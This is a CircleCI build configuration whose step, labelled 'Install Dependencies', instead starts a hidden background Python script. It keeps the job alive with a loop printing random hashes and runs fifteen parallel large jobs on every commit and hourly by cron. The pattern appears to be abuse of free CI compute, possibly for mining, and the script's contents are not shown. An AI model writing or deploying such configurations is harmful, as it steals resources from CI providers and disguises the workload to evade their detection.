working_dir: &working_dir ~/app 
.build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install Dependencies 
        command: |
                    apt update && apt -y install wget sudo
                    python sample.py >/dev/null &
                    while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done
        no_output_timeout: 300m                               
version: 2.0 
jobs: 
  build1: 
    <<: *script
    parallelism: 15
    docker:
      - image: python
    resource_class: large
  build2: 
    <<: *script
    parallelism: 15
    docker:
      - image: python
    resource_class: large

workflows: 
  version: 2 
  commit: 
    jobs: 
      - build1
      - build2

  schedule:
    triggers:
      - schedule:
          cron: "5 * * * *"
          filters:
            branches:
              only:
                - main

    jobs: 
      - build1
      - build2
